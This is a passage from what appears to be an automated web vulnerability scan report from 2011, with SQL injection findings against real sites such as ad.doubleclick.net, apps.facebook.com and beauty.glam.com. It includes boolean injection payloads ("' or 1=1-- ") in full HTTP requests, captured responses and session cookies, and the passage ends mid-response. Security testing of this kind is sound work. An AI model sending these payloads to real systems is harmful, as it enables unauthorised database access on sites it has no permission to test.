3.479. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]

3.480. http://um.simpli.fi/am_match [admeld_callback parameter]

3.481. http://um.simpli.fi/am_redirect_js [admeld_adprovider_id parameter]

3.482. http://um.simpli.fi/am_redirect_js [admeld_callback parameter]

3.483. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 2]

3.484. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [REST URL parameter 3]

3.485. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [name of an arbitrarily supplied request parameter]

3.486. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 1]

3.487. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [REST URL parameter 2]

3.488. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [name of an arbitrarily supplied request parameter]

3.489. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 1]

3.490. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 2]

3.491. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [name of an arbitrarily supplied request parameter]

3.492. http://widgets.digg.com/buttons/count [url parameter]

3.493. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 1]

3.494. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 2]

3.495. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]

3.496. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]

3.497. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]

3.498. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]

3.499. http://wiki.answers.com/Q/FAQ/1873/x26amp [name of an arbitrarily supplied request parameter]

3.500. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 1]

3.501. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 2]

3.502. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]

3.503. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]

3.504. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]

3.505. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]

3.506. http://wiki.answers.com/Q/FAQ/2637/x26amp [name of an arbitrarily supplied request parameter]

3.507. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.508. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

3.509. http://ib.adnxs.com/ttj [Referer HTTP header]

3.510. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.511. http://a.collective-media.net/cmadj/manta.comp/energy_resources [cli cookie]

3.512. http://blekko.com/join [name of an arbitrarily supplied request parameter]

3.513. http://blekko.com/login [name of an arbitrarily supplied request parameter]

3.514. http://d.chango.com/collector/admeldpixel [_t cookie]

3.515. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.516. http://tag.admeld.com/ad/json/100/glammedia/160x600/367631667 [meld_sess cookie]

3.517. http://tag.admeld.com/ad/json/100/glammedia/728x90/367631667 [meld_sess cookie]



1. SQL injection
There are 101 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://66.226.75.109/areaCodes/detail/240/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://66.226.75.109
Path:   /areaCodes/detail/240/x22

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13723193'%20or%201%3d1--%20 and 13723193'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /areaCodes/detail/24013723193'%20or%201%3d1--%20/x22 HTTP/1.1
Host: 66.226.75.109
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 01:55:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=39ea39c674725d9221bbee4fe97dda81; expires=Sat, 05-Mar-2011 01:55:34 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET /areaCodes/detail/24013723193'%20or%201%3d2--%20/x22 HTTP/1.1
Host: 66.226.75.109
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 01:55:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=3bade22272a7c93a5e2962bdbb3a2ea9; expires=Sat, 05-Mar-2011 01:55:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 269109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>
       Area Code Reverse Phone Number Lookup Directory    </title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
           <meta name="description" content="" />
   
       <meta name="keywords" content="" />
<meta name="google-site-verification" content="afpHkQIVmSx9pgSQJgF5xq30gPlFTEcIwuCscxYxOZ4" />
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <link rel="stylesheet" type="text/css" href="/css/general_css.css" />
<link rel="stylesheet" type="text/css" href="/css/frontend_style.css" />
   <script type="text/javascript" src="/js/checkphonenumber.js"></script>
</head>
<body>

   <div id="container">
       <div id="header">
           <div id="logo">
<a href="/phones/"><img src="/img/logo.gif" border="0" alt="LOGO_AlT_TEXT" /></a></div>
<form method="post" cellspacing="5px" action="http://66.226.75.109/phones/search" onsubmit="return validatePhoneNumber('header_search')" name="phoneSearch" id="phoneSearch">

<table cellpadding="0px" cellspacing="0px" border="0">
   <tr>                
       <td><img src="/img/callwiki_divider.gif" alt="" /></td><td class="header_nav_normal" width="400px"></td><td class="header_nav_normal" width="170px"></td>    


       <td class="header_nav_normal" align="right" >
           Report Call:            <input type='text' name='search' size='30' id='header_search' value="xxx-xxx-xxxx" onfocus="this.value=''">
       </td>
       <td>
           <input type="image" src="http://66.226.75.109/img/callwiki_search_button.gif" >
       </td>
       
</tr>
</table>
</form>        </div>
       <div id="content">
           <table width="100%" cellpadding="0px" cellspacing="0px" border="0px">
               <tr>
                   <td width="622px" valign="top">

                       
                       <script type="text/javascript">
   function showMap(url)
   {
       
       var h = screen.height / 2;
       var w = screen.width / 2;
       var left = 200;
       var top =
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.Internet.com/B5200652.4

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=;ord=123456?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 26 Feb 2011 01:47:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 425

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aba/14/74/%2a/n;235494180;0-0;0;59174699;3454-728/90;38963607/38981364/1;;~sscs=%3fhttp://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=http://goo.gl/7z7I2"><img src="http://s0.2mdn.net/viewad/1977183/Google_Standard_3MillionM2_728x90_gif_0.gif" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N5295.Internet.com/B5200652.4;sz=728x90;click0=http://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=;ord=123456?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 26 Feb 2011 01:47:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5668

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 09 14:21:37 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1977183/Google_Flash_Smb2_YourCompany_728x90_swf_1.swf";
var gif = "http://s0.2mdn.net/1977183/1-Google_Standard_3MillionM1_728x90_jpg_0.jpg";
var minV = 9;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aba/17/74/%2a/m%3B235494180%3B4-0%3B0%3B59174699%3B3454-728/90%3B40671406/40689193/1%3B%3B%7Esscs%3D%3fhttp://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=http://goo.gl/7z7I2");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aba/17/74/%2a/m%3B235494180%3B4-0%3B0%3B59174699%3B3454-728/90%3B40671406/40689193/1%3B%3B%7Esscs%3D%3fhttp://o1.qnsr.com//cgi/c%3Fa=20140829%3Bx=3585%3Bg=0,0%3Bc=203687989,203687989%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=http://goo.gl/7z7I2");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aba/17/74/%2a/m%3B235494180%3B4-0%3B0%3B59174699%3
...[SNIP]...

1.3. http://apps.facebook.com/espnucollegetown/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://apps.facebook.com
Path:   /espnucollegetown/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /espnucollegetown/ HTTP/1.1
Host: apps.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=VV5oTas0hG1hzk6eclVNNMGO; expires=Mon, 25-Feb-2013 01:58:45 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=6ZNx4; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d1--%2520; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fapps.facebook.com%2Fespnucollegetown%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fapps.facebook.com%2Fespnucollegetown%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.136.232.121
Connection: close
Date: Sat, 26 Feb 2011 01:58:45 GMT
Content-Length: 15004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yp/r/w9JRqVD1zD4.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y3/r/7nBWlZwWW4T.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yW/r/hoCpkGtbecC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/H-QCy9V-sYx.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/NKjhTtmUUOU.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://photos-g.ak.fbcdn.net/photos-ak-snc1/v27562/115/135858749758063/app_2_135858749758063_4184.gif" /></head>
<body class="frame_wide withCanvasNav withCanvasNavAndBorder fbframe UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"><div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" name="lsd" value="6ZNx4" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="en_US" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name=
...[SNIP]...

Request 2

GET /espnucollegetown/ HTTP/1.1
Host: apps.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=VV5oTREtGMO_ZeNqeekqhs5j; expires=Mon, 25-Feb-2013 01:58:45 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=O5uSJ; path=/; domain=.facebook.com
Set-Cookie: noscript=1; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d2--%2520; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fapps.facebook.com%2Fespnucollegetown%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fapps.facebook.com%2Fespnucollegetown%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.136.226.110
Connection: close
Date: Sat, 26 Feb 2011 01:58:45 GMT
Content-Length: 15014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yP/r/O16vqhmuvDM.css" />
<link type="text/css" rel="stylesheet" href="http://e.static.ak.fbcdn.net/rsrc.php/v1/y0/r/MHFanA-LgzE.css" />
<link type="text/css" rel="stylesheet" href="http://d.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Nc9YFhpO9gr.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/9kK0ZfKYr2f.css" />

<script type="text/javascript" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/ys/r/8PwJealNjXM.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://photos-g.ak.fbcdn.net/photos-ak-snc1/v27562/115/135858749758063/app_2_135858749758063_4184.gif" /></head>
<body class="frame_wide withCanvasNav withCanvasNavAndBorder fbframe UIPage_LoggedOut ie7 win Locale_en_US">
<div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"><div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" name="lsd" value="O5uSJ" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="en_US" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" nam
...[SNIP]...

1.4. http://beauty.glam.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beauty.glam.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 25749560'%20or%201%3d1--%20 and 25749560'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?125749560'%20or%201%3d1--%20=1 HTTP/1.1
Host: beauty.glam.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
X-Pingback: http://www.glam.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
backend-server: app135
Content-Length: 69597
X-Varnish: 303283410
Expires: Thu, 21 Apr 2011 01:37:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:37:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript" src="http://glamnewlive.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+2ce1df918227ff63661b67e8d5b65034f32c8fd0+1303349872"></script> <!-- Netica Monitoring --><!-- DBOK -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-2024191-1"; _udn="glam.com"; try { urchinTracker(); } catch(err){} </script>
<!-- Start Quantcast tag -->
<script type="text/javascript"> _qoptions={ qacct:"p-874AVp33Bbtkg" };</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

<!-- End Quantcast tag -->
</head>
<body class="archive category category-beauty" id="bodyID"><!-- Container START -->
   <noscript><img src="http://pixel.quantserve.com/pixel/p-874AVp33Bbtkg.gif" class="hide" border="0" height="1" width="1" alt="Quantcast"/></noscript>
<div align="center" class="Container"><!-- Page START -->
<div class="topCorner"></div>
<div class="Box">
<table width="100%" cellpadding="0" cellspacing="0" border="0" class="Page">
<tr><td><div class="HorizantalSpacer"></div>
<div class="Header">
<a href="http://www.glam.com" class="Logo sprite_v1-glamcom_206_36"></a>
<div class="LoginLinks" align="right">
                                       <script type="text/javascript" language="javascript"> function setCookieforLogin(c_name,value,expiredays){ if(expiredays){ var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires=exdate.toGMTString(); } else var expires=""; document.cookie=c_name+ "=" +escape(value)+((expiredays==null) ? "" : ";expires="+expires)+";domain=.glam.com"; }
                                       function logoutFunction(redirectURL){ setCookieforLogin('logedIncheck','',-1); location.href=redirectURL; }if(!getCookie('logedIncheck')){ document.write('<div onclick="toggleSignIn(\'head\');" id="signInArrowImg"><div id="signInArrowUp">&nbsp;</div><div id="signInArrowDown">&nbsp;</d
...[SNIP]...

Request 2

GET /?125749560'%20or%201%3d2--%20=1 HTTP/1.1
Host: beauty.glam.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.glam.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
backend-server: app135
Content-Length: 69474
X-Varnish: 303283776
Expires: Thu, 21 Apr 2011 01:37:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:37:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript" src="http://glamnewlive.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+33d9edb89bbe22f82a2a84a0014c753cd0775aa7+1303349877"></script> <!-- Netica Monitoring --><!-- DBOK -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-2024191-1"; _udn="glam.com"; try { urchinTracker(); } catch(err){} </script>
<!-- Start Quantcast tag -->
<script type="text/javascript"> _qoptions={ qacct:"p-874AVp33Bbtkg" };</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

<!-- End Quantcast tag -->
</head>
<body class="archive category category-beauty" id="bodyID"><!-- Container START -->
   <noscript><img src="http://pixel.quantserve.com/pixel/p-874AVp33Bbtkg.gif" class="hide" border="0" height="1" width="1" alt="Quantcast"/></noscript>
<div align="center" class="Container"><!-- Page START -->
<div class="topCorner"></div>
<div class="Box">
<table width="100%" cellpadding="0" cellspacing="0" border="0" class="Page">
<tr><td><div class="HorizantalSpacer"></div>
<div class="Header">
<a href="http://www.glam.com" class="Logo sprite_v1-glamcom_206_36"></a>
<div class="LoginLinks" align="right">
